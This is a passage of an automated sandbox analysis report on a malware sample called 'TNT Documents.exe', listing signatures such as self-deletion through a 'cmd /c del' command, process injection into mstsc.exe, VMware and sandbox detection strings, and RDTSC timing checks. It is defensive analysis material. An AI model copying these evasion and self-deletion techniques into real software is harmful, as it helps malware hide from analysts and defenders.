          Source: 5.0.TNT Documents.exe.130000.2.unpack, Form1.cs.Net Code: X312_45 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.0.TNT Documents.exe.130000.0.unpack, Form1.cs.Net Code: X312_45 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.2.TNT Documents.exe.130000.0.unpack, Form1.cs.Net Code: X312_45 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.0.TNT Documents.exe.130000.3.unpack, Form1.cs.Net Code: X312_45 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 7.2.TNT Documents.exe.aa0000.1.unpack, Form1.cs.Net Code: X312_45 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 7.0.TNT Documents.exe.aa0000.9.unpack, Form1.cs.Net Code: X312_45 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 7.0.TNT Documents.exe.aa0000.2.unpack, Form1.cs.Net Code: X312_45 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 7.0.TNT Documents.exe.aa0000.5.unpack, Form1.cs.Net Code: X312_45 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 7.0.TNT Documents.exe.aa0000.1.unpack, Form1.cs.Net Code: X312_45 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 7.0.TNT Documents.exe.aa0000.7.unpack, Form1.cs.Net Code: X312_45 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 0_2_00080576 push ebx; iretd 0_2_000805B7
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 0_2_06E70ABA pushfd ; iretd 0_2_06E70ABC
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 5_2_00140576 push ebx; iretd 5_2_001405B7
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0041B832 push eax; ret 7_2_0041B838
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0041B83B push eax; ret 7_2_0041B8A2
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0041B89C push eax; ret 7_2_0041B8A2
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0040825A push ecx; retf 7_2_0040825B
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0040C38A pushfd ; ret 7_2_0040C3A0
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_00415CC4 push FFFFFFDFh; iretd 7_2_00415CDA
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0041B7E5 push eax; ret 7_2_0041B838
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_00AB0576 push ebx; iretd 7_2_00AB05B7
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015AD0D1 push ecx; ret 7_2_015AD0E4
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_0560D0D1 push ecx; ret 17_2_0560D0E4
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_0331C38A pushfd ; ret 17_2_0331C3A0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_0331825A push ecx; retf 17_2_0331825B
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_0332B832 push eax; ret 17_2_0332B838
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_0332B83B push eax; ret 17_2_0332B8A2
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_0332B89C push eax; ret 17_2_0332B8A2
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_0332B7E5 push eax; ret 17_2_0332B838
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_03325CC4 push FFFFFFDFh; iretd 17_2_03325CDA
          Source: TNT Documents.exeStatic PE information: 0xA539E86C [Sat Nov 3 17:54:52 2057 UTC]
          Source: initial sampleStatic PE information: section name: .text entropy: 7.56105630003

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Self deletion via cmd deleteShow sources
          Source: C:\Windows\SysWOW64\mstsc.exeProcess created: /c del "C:\Users\user\Desktop\TNT Documents.exe"
          Source: C:\Windows\SysWOW64\mstsc.exeProcess created: /c del "C:\Users\user\Desktop\TNT Documents.exe"Jump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM3Show sources
          Source: Yara matchFile source: Process Memory Space: TNT Documents.exe PID: 4548, type: MEMORYSTR
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: TNT Documents.exe, 00000000.00000002.294558244.00000000026EB000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
          Source: TNT Documents.exe, 00000000.00000002.294558244.00000000026EB000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\TNT Documents.exeRDTSC instruction interceptor: First address: 0000000000408614 second address: 000000000040861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\TNT Documents.exeRDTSC instruction interceptor: First address: 00000000004089AE second address: 00000000004089B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\mstsc.exeRDTSC instruction interceptor: First address: 0000000003318614 second address: 000000000331861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\mstsc.exeRDTSC instruction interceptor: First address: 00000000033189AE second address: 00000000033189B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\TNT Documents.exe TID: 5188Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\mstsc.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_004088E0 rdtsc 7_2_004088E0
          Source: C:\Users\user\Desktop\TNT Documents.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: explorer.exe, 0000000B.00000000.305896440.0000000008A32000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 0000000B.00000000.305896440.0000000008A32000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 0000000B.00000000.309276039.000000000ED78000.00000004.00000001.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: TNT Documents.exe, 00000000.00000002.294558244.00000000026EB000.00000004.00000001.sdmpBinary or memory string: VMware SVGA IIOData Source=localhost\sqlexpress;Initial Catalog=dbSMS;Integrated Security=True
          Source: explorer.exe, 0000000B.00000000.306183659.0000000008B88000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: TNT Documents.exe, 00000000.00000002.294558244.00000000026EB000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: explorer.exe, 0000000B.00000000.306183659.0000000008B88000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}e
          Source: TNT Documents.exe, 00000000.00000002.294558244.00000000026EB000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: TNT Documents.exe, 00000000.00000002.294558244.00000000026EB000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
          Source: explorer.exe, 0000000B.00000000.298506976.00000000048E0000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 0000000B.00000000.306183659.0000000008B88000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}C
          Source: explorer.exe, 0000000B.00000000.305962402.0000000008ACF000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000Datc
          Source: TNT Documents.exe, 00000000.00000002.294558244.00000000026EB000.00000004.00000001.sdmpBinary or memory string: VMWARE
          Source: explorer.exe, 0000000B.00000000.305962402.0000000008ACF000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 0000000B.00000000.339998059.00000000069DA000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD002
          Source: TNT Documents.exe, 00000000.00000002.294558244.00000000026EB000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: TNT Documents.exe, 00000000.00000002.294558244.00000000026EB000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
          Source: TNT Documents.exe, 00000000.00000002.294558244.00000000026EB000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
          Source: TNT Documents.exe, 00000000.00000002.294558244.00000000026EB000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_004088E0 rdtsc 7_2_004088E0
          Source: C:\Users\user\Desktop\TNT Documents.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0157B944 mov eax, dword ptr fs:[00000030h]7_2_0157B944
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0157B944 mov eax, dword ptr fs:[00000030h]7_2_0157B944
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0155B171 mov eax, dword ptr fs:[00000030h]7_2_0155B171
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0155B171 mov eax, dword ptr fs:[00000030h]7_2_0155B171
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0155C962 mov eax, dword ptr fs:[00000030h]7_2_0155C962
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01559100 mov eax, dword ptr fs:[00000030h]7_2_01559100
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01559100 mov eax, dword ptr fs:[00000030h]7_2_01559100
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01559100 mov eax, dword ptr fs:[00000030h]7_2_01559100
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0158513A mov eax, dword ptr fs:[00000030h]7_2_0158513A
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0158513A mov eax, dword ptr fs:[00000030h]7_2_0158513A
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01574120 mov eax, dword ptr fs:[00000030h]7_2_01574120
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01574120 mov eax, dword ptr fs:[00000030h]7_2_01574120
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01574120 mov eax, dword ptr fs:[00000030h]7_2_01574120
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01574120 mov eax, dword ptr fs:[00000030h]7_2_01574120
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01574120 mov ecx, dword ptr fs:[00000030h]7_2_01574120
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0155B1E1 mov eax, dword ptr fs:[00000030h]7_2_0155B1E1
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0155B1E1 mov eax, dword ptr fs:[00000030h]7_2_0155B1E1
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0155B1E1 mov eax, dword ptr fs:[00000030h]7_2_0155B1E1
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015E41E8 mov eax, dword ptr fs:[00000030h]7_2_015E41E8
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01582990 mov eax, dword ptr fs:[00000030h]7_2_01582990
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0157C182 mov eax, dword ptr fs:[00000030h]7_2_0157C182
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0158A185 mov eax, dword ptr fs:[00000030h]7_2_0158A185
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015D51BE mov eax, dword ptr fs:[00000030h]7_2_015D51BE
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015D51BE mov eax, dword ptr fs:[00000030h]7_2_015D51BE
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015D51BE mov eax, dword ptr fs:[00000030h]7_2_015D51BE
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015D51BE mov eax, dword ptr fs:[00000030h]7_2_015D51BE
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015861A0 mov eax, dword ptr fs:[00000030h]7_2_015861A0
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015861A0 mov eax, dword ptr fs:[00000030h]7_2_015861A0
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015D69A6 mov eax, dword ptr fs:[00000030h]7_2_015D69A6
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01570050 mov eax, dword ptr fs:[00000030h]7_2_01570050
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01570050 mov eax, dword ptr fs:[00000030h]7_2_01570050
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01612073 mov eax, dword ptr fs:[00000030h]7_2_01612073
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01621074 mov eax, dword ptr fs:[00000030h]7_2_01621074
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015D7016 mov eax, dword ptr fs:[00000030h]7_2_015D7016
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015D7016 mov eax, dword ptr fs:[00000030h]7_2_015D7016
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015D7016 mov eax, dword ptr fs:[00000030h]7_2_015D7016
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0158002D mov eax, dword ptr fs:[00000030h]7_2_0158002D
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0158002D mov eax, dword ptr fs:[00000030h]7_2_0158002D
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0158002D mov eax, dword ptr fs:[00000030h]7_2_0158002D
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0158002D mov eax, dword ptr fs:[00000030h]7_2_0158002D
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0158002D mov eax, dword ptr fs:[00000030h]7_2_0158002D
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01624015 mov eax, dword ptr fs:[00000030h]7_2_01624015
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01624015 mov eax, dword ptr fs:[00000030h]7_2_01624015
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0156B02A mov eax, dword ptr fs:[00000030h]7_2_0156B02A
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0156B02A mov eax, dword ptr fs:[00000030h]7_2_0156B02A
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0156B02A mov eax, dword ptr fs:[00000030h]7_2_0156B02A
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0156B02A mov eax, dword ptr fs:[00000030h]7_2_0156B02A
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015EB8D0 mov eax, dword ptr fs:[00000030h]7_2_015EB8D0
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015EB8D0 mov ecx, dword ptr fs:[00000030h]7_2_015EB8D0
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015EB8D0 mov eax, dword ptr fs:[00000030h]7_2_015EB8D0
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015EB8D0 mov eax, dword ptr fs:[00000030h]7_2_015EB8D0
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015EB8D0 mov eax, dword ptr fs:[00000030h]7_2_015EB8D0
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015EB8D0 mov eax, dword ptr fs:[00000030h]7_2_015EB8D0
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015558EC mov eax, dword ptr fs:[00000030h]7_2_015558EC
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01559080 mov eax, dword ptr fs:[00000030h]7_2_01559080
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015D3884 mov eax, dword ptr fs:[00000030h]7_2_015D3884
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015D3884 mov eax, dword ptr fs:[00000030h]7_2_015D3884
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0158F0BF mov ecx, dword ptr fs:[00000030h]7_2_0158F0BF
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0158F0BF mov eax, dword ptr fs:[00000030h]7_2_0158F0BF
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0158F0BF mov eax, dword ptr fs:[00000030h]7_2_0158F0BF
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015990AF mov eax, dword ptr fs:[00000030h]7_2_015990AF
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015820A0 mov eax, dword ptr fs:[00000030h]7_2_015820A0
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015820A0 mov eax, dword ptr fs:[00000030h]7_2_015820A0
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015820A0 mov eax, dword ptr fs:[00000030h]7_2_015820A0
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015820A0 mov eax, dword ptr fs:[00000030h]7_2_015820A0
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015820A0 mov eax, dword ptr fs:[00000030h]7_2_015820A0
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015820A0 mov eax, dword ptr fs:[00000030h]7_2_015820A0
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0155F358 mov eax, dword ptr fs:[00000030h]7_2_0155F358
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0155DB40 mov eax, dword ptr fs:[00000030h]7_2_0155DB40
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01583B7A mov eax, dword ptr fs:[00000030h]7_2_01583B7A
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01583B7A mov eax, dword ptr fs:[00000030h]7_2_01583B7A
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0155DB60 mov ecx, dword ptr fs:[00000030h]7_2_0155DB60
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01628B58 mov eax, dword ptr fs:[00000030h]7_2_01628B58
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0161131B mov eax, dword ptr fs:[00000030h]7_2_0161131B
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015D53CA mov eax, dword ptr fs:[00000030h]7_2_015D53CA
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015D53CA mov eax, dword ptr fs:[00000030h]7_2_015D53CA
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015803E2 mov eax, dword ptr fs:[00000030h]7_2_015803E2
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015803E2 mov eax, dword ptr fs:[00000030h]7_2_015803E2
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015803E2 mov eax, dword ptr fs:[00000030h]7_2_015803E2
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015803E2 mov eax, dword ptr fs:[00000030h]7_2_015803E2
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015803E2 mov eax, dword ptr fs:[00000030h]7_2_015803E2
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015803E2 mov eax, dword ptr fs:[00000030h]7_2_015803E2
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0157DBE9 mov eax, dword ptr fs:[00000030h]7_2_0157DBE9
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01625BA5 mov eax, dword ptr fs:[00000030h]7_2_01625BA5
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0158B390 mov eax, dword ptr fs:[00000030h]7_2_0158B390
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01582397 mov eax, dword ptr fs:[00000030h]7_2_01582397
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01561B8F mov eax, dword ptr fs:[00000030h]7_2_01561B8F
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01561B8F mov eax, dword ptr fs:[00000030h]7_2_01561B8F
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0160D380 mov ecx, dword ptr fs:[00000030h]7_2_0160D380
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0161138A mov eax, dword ptr fs:[00000030h]7_2_0161138A
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01584BAD mov eax, dword ptr fs:[00000030h]7_2_01584BAD
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01584BAD mov eax, dword ptr fs:[00000030h]7_2_01584BAD
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01584BAD mov eax, dword ptr fs:[00000030h]7_2_01584BAD
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0160B260 mov eax, dword ptr fs:[00000030h]7_2_0160B260
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0160B260 mov eax, dword ptr fs:[00000030h]7_2_0160B260
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01628A62 mov eax, dword ptr fs:[00000030h]7_2_01628A62
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015E4257 mov eax, dword ptr fs:[00000030h]7_2_015E4257
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01559240 mov eax, dword ptr fs:[00000030h]7_2_01559240
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01559240 mov eax, dword ptr fs:[00000030h]7_2_01559240
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01559240 mov eax, dword ptr fs:[00000030h]7_2_01559240
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01559240 mov eax, dword ptr fs:[00000030h]7_2_01559240
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0159927A mov eax, dword ptr fs:[00000030h]7_2_0159927A
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0161EA55 mov eax, dword ptr fs:[00000030h]7_2_0161EA55
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0155AA16 mov eax, dword ptr fs:[00000030h]7_2_0155AA16
